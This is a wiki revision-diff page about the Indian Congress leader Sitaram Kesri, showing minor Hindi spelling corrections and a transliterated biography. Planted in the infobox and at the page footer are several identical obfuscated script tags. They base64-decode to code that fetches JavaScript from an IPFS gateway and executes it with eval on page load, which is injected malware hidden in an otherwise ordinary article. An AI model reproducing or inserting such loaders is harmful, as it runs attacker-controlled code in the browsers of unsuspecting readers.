Difference between revisions of "सीताराम केसरी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
(One intermediate revision by one other user not shown)
Line 36: Line 36:
 
'''सीताराम केसरी''' ([[अंग्रेज़ी]]: ''Sitaram Kesri'', जन्म- [[1916]]; मृत्यु- [[24 अक्टूबर]], [[2000]], [[नई दिल्ली]]) [[भारत]] के प्रसिद्ध राजनीतिज्ञों में से एक थे। वह केंद्रीय मंत्री थे और [[1996]] से [[1998]] तक [[भारतीय राष्ट्रीय कांग्रेस]] के अध्यक्ष रहे थे।
 
'''सीताराम केसरी''' ([[अंग्रेज़ी]]: ''Sitaram Kesri'', जन्म- [[1916]]; मृत्यु- [[24 अक्टूबर]], [[2000]], [[नई दिल्ली]]) [[भारत]] के प्रसिद्ध राजनीतिज्ञों में से एक थे। वह केंद्रीय मंत्री थे और [[1996]] से [[1998]] तक [[भारतीय राष्ट्रीय कांग्रेस]] के अध्यक्ष रहे थे।
  
*सीताराम केसरी का जन्म सन 1916 में एक गरीब [[परिवार]] में हुआ था।
+
*सीताराम केसरी का जन्म सन 1916 में एक ग़रीब [[परिवार]] में हुआ था।
 
*वे जब मुश्किल से 13 वर्ष के थे, तभी [[बिहार]] में [[भारतीय राष्ट्रीय आंदोलन|राष्ट्रीय स्वतंत्रता आंदोलन]] में कूद पड़े।
 
*वे जब मुश्किल से 13 वर्ष के थे, तभी [[बिहार]] में [[भारतीय राष्ट्रीय आंदोलन|राष्ट्रीय स्वतंत्रता आंदोलन]] में कूद पड़े।
*एक गरीब परिवार में जन्म लेकर केसरी जी ने प्रखण्ड स्तर से अपनी राजनैतिक यात्रा शुरू की।
+
*एक ग़रीब परिवार में जन्म लेकर केसरी जी ने प्रखण्ड स्तर से अपनी राजनैतिक यात्रा शुरू की।
 
*युवा नेता के रूप में वह अपने गृह राज्य बिहार में [[असहयोग आन्दोलन]] और [[सत्याग्रह]] के बड़े आयोजक थे।
 
*युवा नेता के रूप में वह अपने गृह राज्य बिहार में [[असहयोग आन्दोलन]] और [[सत्याग्रह]] के बड़े आयोजक थे।
 
*सन [[1930]], [[1932]] तथा [[1933]] के दौरान सीताराम केसरी कई बार [[अंग्रेज़|अंग्रेज़ों]] द्वारा गिरफ्तार किये गये।
 
*सन [[1930]], [[1932]] तथा [[1933]] के दौरान सीताराम केसरी कई बार [[अंग्रेज़|अंग्रेज़ों]] द्वारा गिरफ्तार किये गये।
Line 44: Line 44:
 
*यूनियन कैबिनेट मंत्री के रूप में उन्होंने बहुत से विभागों में काम किया।
 
*यूनियन कैबिनेट मंत्री के रूप में उन्होंने बहुत से विभागों में काम किया।
 
*[[1997]] में [[कलकत्ता]] में वह भारतीय राष्ट्रीय कांग्रेस के अध्यक्ष रहे।
 
*[[1997]] में [[कलकत्ता]] में वह भारतीय राष्ट्रीय कांग्रेस के अध्यक्ष रहे।
*कांग्रेस के प्रति अपनी निष्ठा, राजनैतिक जीवन में ईमानदारी एवं कांग्रेस नेतृत्व के प्रति पूरी निष्ठा के चलते केसरी जी ने बिहार प्रदेश कांग्रेस कमिटी के अध्यक्ष, केन्द्रीय मंत्री एवं अंततः कांग्रेस के राष्ट्रीय अध्यक्ष के पद को भी सुषोभित किया था।
+
*कांग्रेस के प्रति अपनी निष्ठा, राजनैतिक जीवन में ईमानदारी एवं कांग्रेस नेतृत्व के प्रति पूरी निष्ठा के चलते केसरी जी ने बिहार प्रदेश कांग्रेस कमिटी के अध्यक्ष, केन्द्रीय मंत्री एवं अंततः कांग्रेस के राष्ट्रीय अध्यक्ष के पद को भी सुशोभित किया था।
 
*सीताराम केसरी का निधन [[24 अक्टूबर]], [[2000]] को 81 वर्ष की उम्र में अखिल भारतीय आयुर्विज्ञान संस्थान (एम्स), [[नई दिल्ली]] में हुआ।
 
*सीताराम केसरी का निधन [[24 अक्टूबर]], [[2000]] को 81 वर्ष की उम्र में अखिल भारतीय आयुर्विज्ञान संस्थान (एम्स), [[नई दिल्ली]] में हुआ।
  

Latest revision as of 11:31, 22 October 2020

sitaram kesari
poora nam sitaram kesari
janm 1916
mrityu 24 aktoobar, 2000
mrityu sthan nee dilli, bharat
nagarikata bharatiy
prasiddhi rajanitijn
parti bharatiy rashtriy kaangres
kaangres adhyaksh sitambar, 1996 se 14 march, 1998
any janakari san 1930, 1932 tatha 1933 ke dauran sitaram kesari kee bar aangrezoan dvara giraphtar kiye gaye.
bahari k diyaan <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script><script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sitaram kesari (aangrezi: Sitaram Kesri, janm- 1916; mrityu- 24 aktoobar, 2000, nee dilli) bharat ke prasiddh rajanitijnoan mean se ek the. vah keandriy mantri the aur 1996 se 1998 tak bharatiy rashtriy kaangres ke adhyaksh rahe the.

  • sitaram kesari ka janm san 1916 mean ek garib parivar mean hua tha.
  • ve jab mushkil se 13 varsh ke the, tabhi bihar mean rashtriy svatantrata aandolan mean kood p de.
  • ek garib parivar mean janm lekar kesari ji ne prakhand star se apani rajanaitik yatra shuroo ki.
  • yuva neta ke roop mean vah apane grih rajy bihar mean asahayog andolan aur satyagrah ke b de ayojak the.
  • san 1930, 1932 tatha 1933 ke dauran sitaram kesari kee bar aangrezoan dvara giraphtar kiye gaye.
  • sitaram kesari, jo chhah dashak se adhik samay tak kaangres se ju de rahe, kee saloan tak isake koshadhyaksh rahe.
  • yooniyan kaibinet mantri ke roop mean unhoanne bahut se vibhagoan mean kam kiya.
  • 1997 mean kalakatta mean vah bharatiy rashtriy kaangres ke adhyaksh rahe.
  • kaangres ke prati apani nishtha, rajanaitik jivan mean eemanadari evan kaangres netritv ke prati poori nishtha ke chalate kesari ji ne bihar pradesh kaangres kamiti ke adhyaksh, kendriy mantri evan aantatah kaangres ke rashtriy adhyaksh ke pad ko bhi sushobhit kiya tha.
  • sitaram kesari ka nidhan 24 aktoobar, 2000 ko 81 varsh ki umr mean akhil bharatiy ayurvijnan sansthan (ems), nee dilli mean hua.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>